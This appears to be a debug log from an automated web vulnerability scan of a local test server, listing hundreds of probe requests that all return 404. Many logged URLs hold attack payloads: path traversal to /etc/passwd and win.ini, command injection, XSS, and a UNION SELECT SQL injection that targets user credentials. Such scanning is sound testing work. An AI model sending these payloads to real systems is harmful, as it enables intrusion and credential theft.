http://localhost:9090/modules.php?op=modload&name=News&file=article&sid== returned HTTP code "404" (id=22640,from_cache=0,grep=1,rtt=0.06,did=WhoVkL43) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4310. [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/cgi-bin/snorkerz.bat returned HTTP code "404" (id=22643,from_cache=0,grep=1,rtt=0.03,did=4qNZ9kJF) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/whatever2a4J.html returned HTTP code "404" (id=22644,from_cache=0,grep=1,rtt=0.11,did=479wN9Ff) [Wed Feb 12 10:04:24 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/cgi-bin/cmd1.exe?/c dir= returned HTTP code "404" (id=22642,from_cache=0,grep=1,rtt=0.04,did=pS6ln757) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4311. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4312. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2086. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/servlets/MsgPage?action=badlogin&msg= returned HTTP code "404" (id=22645,from_cache=0,grep=1,rtt=0.07,did=kPkP5MBR) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4313. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2087. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4314. [Wed Feb 12 10:04:24 2020 - debug] localhost:9090 connection pool stats (free:91 / in_use:12 / max:50 / total:103) [Wed Feb 12 10:04:24 2020 - debug] Connections with more in use time: (49303da565ef873b, 0.13 sec) (6b4979a0efadf95a, 0.11 sec) (d3dee0b93e113e11, 0.10 sec) (784a5da77f81edc0, 0.08 sec) (bfbfe4de64ee73f0, 0.07 sec) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/\x00/ returned HTTP code "404" (id=22649,from_cache=0,grep=1,rtt=0.13,did=3B5BJXgy) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini= returned HTTP code "404" (id=22651,from_cache=0,grep=1,rtt=0.05,did=9t98jYMo) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/nsn/..\\util/del.bas returned HTTP code "404" (id=22652,from_cache=0,grep=1,rtt=0.11,did=Rdfmxa6j) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/logbook.pl?file=../../../../../../../bin/cat /etc/passwd\x00| returned HTTP code "404" (id=22646,from_cache=0,grep=1,rtt=0.11,did=PR0FWrdF) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22648,from_cache=0,grep=1,rtt=0.01,did=TYwXS98t) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/nsn/..\\util/userlist.bas returned HTTP code "404" (id=22650,from_cache=0,grep=1,rtt=0.09,did=8gfnUKNj) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2088. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2089. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/search/htx/SQLQHit.asp returned HTTP code "404" (id=22653,from_cache=0,grep=1,rtt=0.11,did=ScPOM9DC) [Wed Feb 12 10:04:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11543, 'reject-seen-url': 5561, 'reject-out-of-scope': 215, 'accept': 4706} [Wed Feb 12 10:04:24 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11543, 'reject-seen-url': 5561, 'reject-out-of-scope': 215, 'accept': 4706} [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/postnuke/html/My_eGallery/public/displayCategory.php returned HTTP code "404" (id=22647,from_cache=0,grep=1,rtt=0.16,did=DQLOyiWR) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah= returned HTTP code "404" (id=22654,from_cache=0,grep=1,rtt=0.09,did=d102b8fe) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22656,from_cache=0,grep=1,rtt=0.04,did=vpCcgS7O) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/contents.php?new_language=elvish&mode=select returned HTTP code "404" (id=22657,from_cache=0,grep=1,rtt=0.10,did=pRrrgfS7) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini returned HTTP code "404" (id=22659,from_cache=0,grep=1,rtt=0.11,did=IbwZ0Hy1) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22660,from_cache=0,grep=1,rtt=0.10,did=JO4emhBn) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/search/results.stm?query=<=<=&script=>=>=&alert(\'vulnerable\')=&/script= returned HTTP code "404" (id=22661,from_cache=0,grep=1,rtt=0.22,did=08HIVOeO) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4314. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2090. [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4314. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22655,from_cache=0,grep=1,rtt=0.13,did=zYEOF3KK) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2091. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/detect/ returned HTTP code "404" (id=22662,from_cache=0,grep=1,rtt=0.04,did=DeILIfKN) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/cgi-bin/nph-error.pl returned HTTP code "404" (id=22667,from_cache=0,grep=1,rtt=0.04,did=OZF3ru8l) [Wed Feb 12 10:04:24 2020 - debug] HEAD http://localhost:9090/admin-serv/config/admpw returned HTTP code "404" (id=22668,from_cache=0,grep=1,rtt=0.14,did=LIMPTn9k) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/webdist.cgi?distloc=&cat /etc/passwd= returned HTTP code "404" (id=22669,from_cache=0,grep=1,rtt=0.25,did=RLyNu8rB) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/examples/session returned HTTP code "404" (id=22671,from_cache=0,grep=1,rtt=0.13,did=WqAiNHQ5) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd\x00board=board_1 returned HTTP code "404" (id=22665,from_cache=0,grep=1,rtt=0.08,did=jAAOjBmh) [Wed Feb 12 10:04:24 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4315. [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/winnt/repair/sam._ returned HTTP code "404" (id=22664,from_cache=0,grep=1,rtt=0.05,did=hlEkH16K) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/\\/ returned HTTP code "404" (id=22674,from_cache=0,grep=1,rtt=0.15,did=KyDS6Sez) [Wed Feb 12 10:04:24 2020 - debug] GET http://localhost:9090/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini returned HTTP code "404" (id=22675,from_cache=0,grep=1,rtt=0.12,did=v8Ounbgw) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/search.php?searchstring= returned HTTP code "404" (id=22663,from_cache=0,grep=1,rtt=0.03,did=7CZLqgZH) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/examples/jsp/source.jsp??= returned HTTP code "404" (id=22670,from_cache=0,grep=1,rtt=0.02,did=Ppmq0IOb) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22666,from_cache=0,grep=1,rtt=0.09,did=1vnOgtqu) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* returned HTTP code "404" (id=22658,from_cache=0,grep=1,rtt=0.08,did=dOkx4pqh) [Wed Feb 12 10:04:25 2020 - debug] symfony.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] private_ip.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/1987/ returned HTTP code "404" (id=22672,from_cache=0,grep=1,rtt=0.09,did=k8om5NR1) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini returned HTTP code "404" (id=22676,from_cache=0,grep=1,rtt=0.10,did=dSacOkJ3) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/JS/ returned HTTP code "404" (id=22677,from_cache=0,grep=1,rtt=0.06,did=ErvJrXXs) [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/cgi-bin/hpnst.exe?c=p i=SrvSystemInfo.html returned HTTP code "404" (id=22678,from_cache=0,grep=1,rtt=0.37,did=tjCc7ll7) [Wed Feb 12 10:04:25 2020 - debug] file_upload.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] expect_ct.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4316. [Wed Feb 12 10:04:25 2020 - debug] svn_users.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/cgi-bin/fortune returned HTTP code "404" (id=22673,from_cache=0,grep=1,rtt=0.23,did=wmEocLy2) [Wed Feb 12 10:04:25 2020 - debug] motw.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] meta_generator.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] retirejs.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] serialized_object.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] blank_body.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] credit_cards.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] websockets_links.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] csp.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] dom_xss.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] vulners_db.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] keys.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] clamav.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] objects.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] error_500.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] meta_tags.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] password_profiling.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] click_jacking.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] lang.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2092. [Wed Feb 12 10:04:25 2020 - debug] url_session.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.03s to run [Wed Feb 12 10:04:25 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.06s to run [Wed Feb 12 10:04:25 2020 - debug] strange_reason.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] cache_control.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] strange_headers.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] ssn.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] oracle.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] feeds.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.00s to run [Wed Feb 12 10:04:25 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11564, 'reject-seen-url': 5561, 'reject-out-of-scope': 215, 'accept': 4710} [Wed Feb 12 10:04:25 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11564, 'reject-seen-url': 5561, 'reject-out-of-scope': 215, 'accept': 4710} [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= returned HTTP code "404" (id=22679,from_cache=0,grep=1,rtt=0.04,did=xHhsNeJ3) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4317. [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/forum/admin/database/wwForum.mdb returned HTTP code "404" (id=22600,from_cache=0,grep=1,rtt=0.04,did=YOxl9I99) [Wed Feb 12 10:04:25 2020 - debug] error_pages.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.06s to run [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4318. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/z_user_show.php?method=showuserlink&class=&rollid=admin&x=3da59a9da8825 returned HTTP code "404" (id=22680,from_cache=0,grep=1,rtt=0.06,did=jUQTWnGi) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4319. [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/cgi-bin/hello.bat?dir c:\\\\= returned HTTP code "404" (id=22682,from_cache=0,grep=1,rtt=0.17,did=KPrVZDNC) [Wed Feb 12 10:04:25 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/lib/validpay.php3") took 0.08s to run [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=News&file=article&sid== returned HTTP code "404" (id=22681,from_cache=0,grep=1,rtt=0.13,did=3l26C4EB) [Wed Feb 12 10:04:25 2020 - debug] localhost:9090 connection pool stats (free:102 / in_use:1 / max:50 / total:103) [Wed Feb 12 10:04:25 2020 - debug] Connections with more in use time: (7325e6fa6706fd6a, 0.03 sec) [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/modules/My_eGallery/public/displayCategory.php returned HTTP code "404" (id=22683,from_cache=0,grep=1,rtt=0.07,did=t8OFICBz) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4320. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/modules.php?name=Downloads&d_op=viewdownload returned HTTP code "404" (id=22684,from_cache=0,grep=1,rtt=0.10,did=4Jys9xTk) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/dansguardian.pl?DENIEDURL== returned HTTP code "404" (id=22685,from_cache=0,grep=1,rtt=0.02,did=7o2bVG5T) [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/nsn/..\\util/dir.bas returned HTTP code "404" (id=22686,from_cache=0,grep=1,rtt=0.03,did=f50VQ4Aw) [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/cgi-bin/snorkerz.cmd returned HTTP code "404" (id=22687,from_cache=0,grep=1,rtt=0.05,did=40r7Xvha) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4321. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22688,from_cache=0,grep=1,rtt=0.10,did=0O8C3cz1) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2093. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/.shtm returned HTTP code "404" (id=22689,from_cache=0,grep=1,rtt=0.23,did=lxvHJTiB) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/script>alert(\'Vulnerable\').cfm returned HTTP code "404" (id=22691,from_cache=0,grep=1,rtt=0.05,did=IDRHE16H) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd\x00 returned HTTP code "404" (id=22690,from_cache=0,grep=1,rtt=0.09,did=2CT5qBkK) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4322. [Wed Feb 12 10:04:25 2020 - debug] localhost:9090 connection pool stats (free:100 / in_use:5 / max:50 / total:105) [Wed Feb 12 10:04:25 2020 - debug] Connections with more in use time: (ae4284cec7365062, 0.07 sec) (cfc650e1371fda81, 0.03 sec) (f68474ff126c8504, 0.02 sec) (650348b5951f295c, 0.02 sec) (872ee7d98f5906e9, 0.01 sec) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2094. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd= returned HTTP code "404" (id=22694,from_cache=0,grep=1,rtt=0.12,did=NZHvKAqn) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/test.php returned HTTP code "404" (id=22695,from_cache=0,grep=1,rtt=0.04,did=Zj6gJ0wT) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/search/sqlqhit.asp returned HTTP code "404" (id=22696,from_cache=0,grep=1,rtt=0.04,did=zR4yChsu) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/asp/SQLQHit.asp returned HTTP code "404" (id=22697,from_cache=0,grep=1,rtt=0.05,did=S17H9TQL) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/setup.exe?=&page=list_users&user=P returned HTTP code "404" (id=22699,from_cache=0,grep=1,rtt=0.02,did=wHTJU0wp) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/indexer/ returned HTTP code "404" (id=22701,from_cache=0,grep=1,rtt=0.07,did=50fXVN69) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini= returned HTTP code "404" (id=22702,from_cache=0,grep=1,rtt=0.05,did=TWkOu7TR) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/administrator/gallery/navigation.php?directory=\\" returned HTTP code "404" (id=22692,from_cache=0,grep=1,rtt=0.16,did=EN5ZbGj2) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2095. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/templates/form_header.php?noticemsg= returned HTTP code "404" (id=22700,from_cache=0,grep=1,rtt=0.09,did=4aZtaKJw) [Wed Feb 12 10:04:25 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11578, 'reject-seen-url': 5563, 'reject-out-of-scope': 215, 'accept': 4719} [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/@TYPO3typo3/dev/translations.php?ONLY=../../../../../etc/passwd\x00 returned HTTP code "404" (id=22693,from_cache=0,grep=1,rtt=0.12,did=bm7Z741F) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/stats/statsbrowse.asp?filepath=c:\\&Opt=3 returned HTTP code "404" (id=22706,from_cache=0,grep=1,rtt=0.08,did=9ykhxnyb) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter returned HTTP code "404" (id=22707,from_cache=0,grep=1,rtt=0.07,did=yWU9m9UA) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22708,from_cache=0,grep=1,rtt=0.12,did=wcf0aARc) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2096. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cfdocs/cfmlsyntaxcheck.cfm returned HTTP code "404" (id=22704,from_cache=0,grep=1,rtt=0.13,did=lxTBQVvG) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/way-board/way-board.cgi?db=/etc/passwd\x00 returned HTTP code "404" (id=22698,from_cache=0,grep=1,rtt=0.08,did=KA3h9lw5) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/................../etc/passwd returned HTTP code "404" (id=22705,from_cache=0,grep=1,rtt=0.03,did=fZjRlA8e) [Wed Feb 12 10:04:25 2020 - debug] POST http://localhost:9090/cgi-bin/post-query returned HTTP code "404" (id=22703,from_cache=0,grep=1,rtt=0.07,did=9Bx7rp1k) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4322. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/\\/ returned HTTP code "404" (id=22711,from_cache=0,grep=1,rtt=0.14,did=9m5gpfvd) [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/cgi-bin/post32.exe|dir c:\\\\ returned HTTP code "404" (id=22709,from_cache=0,grep=1,rtt=0.03,did=J9T6HajL) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22717,from_cache=0,grep=1,rtt=0.12,did=GsfRvsw5) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/sawmill5?rfcf "/etc/passwd" spbn 1,1,21,1,1,1,1= returned HTTP code "404" (id=22715,from_cache=0,grep=1,rtt=0.11,did=gNdHzmqJ) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor returned HTTP code "404" (id=22716,from_cache=0,grep=1,rtt=0.06,did=mOIXKUkK) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah= returned HTTP code "404" (id=22712,from_cache=0,grep=1,rtt=0.14,did=y89yrYgA) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/themes/mambosimple.php?detection=detected&sitename= returned HTTP code "404" (id=22714,from_cache=0,grep=1,rtt=0.02,did=daoyDAyI) [Wed Feb 12 10:04:25 2020 - debug] HEAD http://localhost:9090/webmail/blank.html returned HTTP code "404" (id=22713,from_cache=0,grep=1,rtt=0.03,did=iXjJJ7ET) [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2097. [Wed Feb 12 10:04:25 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4322. [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/webtop/wdk/samples/dumpRequest.jsp?J=f= returned HTTP code "404" (id=22718,from_cache=0,grep=1,rtt=0.11,did=2fvuEoRd) [Wed Feb 12 10:04:25 2020 - debug] GET http://localhost:9090/catinfo?\\">TESTING= returned HTTP code "404" 